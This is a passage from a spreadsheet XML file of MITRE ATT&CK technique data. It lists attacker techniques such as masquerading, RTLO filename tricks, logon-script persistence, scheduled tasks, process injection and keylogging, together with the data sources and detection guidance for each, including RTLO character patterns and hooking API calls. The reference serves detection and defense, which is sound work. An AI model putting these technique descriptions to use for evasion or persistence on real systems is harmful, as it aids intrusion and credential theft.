  <si>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Signature-based detection,Host intrusion prevention systems,Anti-virus,Binary Analysis,Static File Analysis</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Anti-virus,Host intrusion prevention systems,Log analysis,Signature-based detection</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Process monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</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</si>
  <si>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</si>
  <si>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 adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</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</si>
  <si>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</si>
  <si>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Utilities and commands that acquire this information include &lt;code&gt;whoami&lt;/code&gt;. In Mac and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring</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</si>
  <si>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</si>
  <si>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**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: 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 Unquoted Paths
Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: 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SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)
###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 Search Order Hijacking
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT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MSDN Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).</t>
  </si>
  <si>
    <t>persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</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</si>
  <si>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Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Application control by file name or path</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</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</si>
  <si>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</si>
  <si>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T1036.002</t>
  </si>
  <si>
    <t>Right-to-Left Override</t>
  </si>
  <si>
    <t>Detection methods should include looking for common formats of RTLO characters within filenames such as &lt;code&gt;\u202E&lt;/code&gt;, &lt;code&gt;[U+202E]&lt;/code&gt;, and &lt;code&gt;%E2%80%AE&lt;/code&gt;. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.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</si>
  <si>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T1036.003</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>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Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</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</si>
  <si>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Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Windows,Linux</t>
  </si>
  <si>
    <t>Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services.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</si>
  <si>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</si>
  <si>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T1036.005</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</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</si>
  <si>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Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files when naming/placing their files. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Space after Filename</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>macOS,Windows,Linux</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Logon Script (Mac)</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)
Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t xml:space="preserve">The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. </t>
  </si>
  <si>
    <t>Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Startup Items</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</si>
  <si>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</si>
  <si>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 (Citation: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 (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Sniffing</t>
  </si>
  <si>
    <t>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</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</si>
  <si>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</si>
  <si>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also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>credential-access,discovery</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**
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</si>
  <si>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Network Service Scanning</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure</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</si>
  <si>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</si>
  <si>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Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</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</si>
  <si>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</si>
  <si>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Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>execution</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</t>
  </si>
  <si>
    <t xml:space="preserve">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Different protocol channels could also include Web services such as cloud storage.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t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Malware reverse engineering,Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</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</si>
  <si>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Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </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</si>
  <si>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</si>
  <si>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T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.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</si>
  <si>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System Network Connections Discovery</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure</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</si>
  <si>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t>
  </si>
  <si>
    <t>Shared Webroot</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</si>
  <si>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</si>
  <si>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**This technique has been deprecated and should no longer be used.**
Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018)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 (Citation: Webroot PHP 2011)</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Process monitoring,Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</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</si>
  <si>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</si>
  <si>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T1052.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Scheduled Task/Job</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>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</si>
  <si>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requires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t>
  </si>
  <si>
    <t>execution,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>T1053.001</t>
  </si>
  <si>
    <t>At (Linux)</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor scheduled task creation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</si>
  <si>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abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>At (Windows)</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe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[PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;at.exe&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. 
An adversary may use &lt;code&gt;at.exe&lt;/code&gt; in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
Note: The &lt;code&gt;at.exe&lt;/code&gt; command line utility has been deprecated in current versions of Windows in favor of &lt;code&gt;schtasks&lt;/code&gt;.</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.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 &lt;code&gt;cron&lt;/code&gt; can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>T1053.004</t>
  </si>
  <si>
    <t>Launchd</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;Launchd&lt;/code&gt; daemon to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;launchd&lt;/code&gt; daemon, native to macOS, is responsible for loading and maintaining services within the operating system.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An adversary may use the &lt;code&gt;launchd&lt;/code&gt; daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. &lt;code&gt;launchd&lt;/code&gt; can also be abused to run a process under the context of a specified account. Daemons, such as &lt;code&gt;launchd&lt;/code&gt;, run with the permissions of the root user account, and will operate regardless of which user account is logged in.</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>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 and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The &lt;code&gt;schtasks&lt;/code&gt;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 (Windows)](https://attack.mitre.org/techniques/T1053/002)),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 or to run a process under the context of a specified account (such as SYSTEM).</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Systemd Timers</t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</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</si>
  <si>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t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</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</si>
  <si>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Endgame Process Injection July 2017) 
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.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Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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defense-evasion,privilege-escalation</t>
  </si>
  <si>
    <t>Application control,Anti-virus</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring,File monitoring,API monitoring</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</si>
  <si>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Endgame Process Injection July 2017)
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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Endgame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Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</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</si>
  <si>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Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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Endgame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t>
  </si>
  <si>
    <t>Anti-virus,Application control</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</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</si>
  <si>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and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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Endgame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t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</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</si>
  <si>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Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>System calls,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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with high-privileges, and on some system those that are non-child processes.(Citation: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t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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[LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006)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t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</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</si>
  <si>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Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">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Endgame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t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">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Endgame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t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;.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</si>
  <si>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 xml:space="preserve">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Hollowing](https://attack.mitre.org/techniques/T1093),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t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path.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Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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 (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: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t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</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</si>
  <si>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t>
  </si>
  <si>
    <t>collection,credential-access</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Windows,macOS,Linux,Network</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>PowerShell logs,User interface,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t xml:space="preserve">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AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). </t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Web Portal Capture</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,Loaded DLLs,DLL monitoring,Binary file metadata,API monitoring</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">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Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t>Process 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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.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</si>
  <si>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[JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007)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t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,Process command-line parameters,PowerShell logs,Loaded DLLs,File monitoring,DLL monitoring</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</si>
  <si>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Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: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 (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
